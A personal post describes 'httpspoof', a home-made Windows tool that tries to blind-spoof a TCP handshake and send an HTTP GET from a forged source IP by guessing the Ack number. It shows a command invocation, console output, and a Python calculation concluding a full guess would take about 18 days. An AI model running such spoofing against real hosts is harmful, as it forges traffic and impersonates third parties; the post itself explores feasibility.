Somebody on a forum posted a survey about the feasibility of spoofing the TCP handshake without having knowledge of the Ack number. I was bored so I whipped up a potential proof of concept example. Don't run it against anything on the Internet, it is intended as a local network proof of concept only. Seriously, spoofing packets on the internet is a dick move. I don't want to hear about it if you get yourself in trouble.
Httpspoof tries to do an HTTP GET against / on a specified IP address or domain name, using a specified spoofed source IP address. I haven't run it successfully: it is single threaded, and on my local test network it appears it would take about 18 days to get a reasonable chance of colliding with the real Ack number.
I twisted httpspoof out of tcproute, so it shares a lot of the same options, requirements and caveats. In particular it requires a WinPcap installation and some Microsoft packages for the WinPcap DLLs.
C:\>httpspoof.exe --lip 192.168.2.123 --lmac 90:b1:1c:XX:XX:XX 192.168.2.5
Available interfaces: (use with -i to avoid interaction next time)
1. Network adapter 'Realtek PCIe GBE Family Controller' on local host rpcap://\Device\NPF_{962899E7-D4BB-49E6-BACB-7AD9F32842F4} Internet 192.168.2.20
Select the listening interface (1-1): 1
Ensuring gateway address (192.168.2.1) is in arp... OK!
Using the following values:
---------------------------
Local IP: 192.168.2.123
Local MAC: 90:b1:1c:XX:XX:XX
Gateway MAC: 00:1F:5B:XX:XX:XX
Remote IP: 192.168.2.5
Hitting / on 192.168.2.5:80
1000 attempts. Statistically expect 0.0000002328306 hits by now. ~1672446.96125748s left
2000 attempts. Statistically expect 0.0000004656613 hits by now. ~1624139.76954944s left
3000 attempts. Statistically expect 0.0000006984919 hits by now. ~1606849.58135746s left
4000 attempts. Statistically expect 0.0000009313226 hits by now. ~1599732.74637451s left
5000 attempts. Statistically expect 0.0000011641530 hits by now. ~1593367.59815554s left
... etc
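The "Statistically expect" and "s left" figures above follow from a 1-in-2^32 chance per blind guess; the following is an added worked example (my own, not part of httpspoof or this post) that reproduces those numbers and turns them into a feasibility estimate for a single-threaded guesser. The guess rate is derived from the 5000-attempt line, and the exact-match model (one Ack value out of 2^32 is accepted) is an assumption carried over from the post.

```python
ACK_SPACE = 2 ** 32  # size of the 32-bit TCP acknowledgement-number space


def expected_hits(attempts):
    """Expected number of guesses that matched the real Ack after `attempts`
    blind tries, with a 1/2^32 chance per try (the model behind httpspoof's
    'Statistically expect ... hits by now' line)."""
    return attempts / ACK_SPACE


def hit_probability(attempts, distinct=True):
    """Chance that at least one guess was right.
    distinct=True: guesses never repeat, so P = N / 2^32.
    distinct=False: guesses are independent, so P = 1 - (1 - 1/2^32)^N."""
    if distinct:
        return min(attempts, ACK_SPACE) / ACK_SPACE
    return 1.0 - (1.0 - 1.0 / ACK_SPACE) ** attempts


def seconds_to_probability(target_probability, guesses_per_second):
    """Seconds of continuous, non-repeating guessing needed before the chance
    of at least one hit reaches `target_probability` at a fixed rate."""
    return target_probability * ACK_SPACE / guesses_per_second


def seconds_remaining(attempts, elapsed_seconds):
    """httpspoof-style countdown: time to finish sweeping the whole space at
    the rate observed so far."""
    rate = attempts / elapsed_seconds
    return (ACK_SPACE - attempts) / rate


def feasibility_report(guesses_per_second):
    """Summarise how long a blind guesser would need at the given rate."""
    day = 86400.0
    return {
        "full_sweep_days": seconds_to_probability(1.0, guesses_per_second) / day,
        "fifty_percent_days": seconds_to_probability(0.5, guesses_per_second) / day,
        "hits_after_one_hour": expected_hits(guesses_per_second * 3600),
    }


if __name__ == "__main__":
    # Constructed rate: the 5000-attempt line above reports ~1593367 s left,
    # which works out to roughly 2696 guesses per second.
    observed_rate = (ACK_SPACE - 5000) / 1593367.59815554
    print(f"expected hits after 1000 tries: {expected_hits(1000):.13f}")
    print(f"observed rate: {observed_rate:.0f} guesses/s")
    for name, value in feasibility_report(observed_rate).items():
        print(f"{name}: {value:.4g}")
```

At the rate httpspoof reports, a full sweep of the Ack space is about 18.4 days and even a 50% chance is over nine days, which is the reason the post treats the single-threaded approach as impractical.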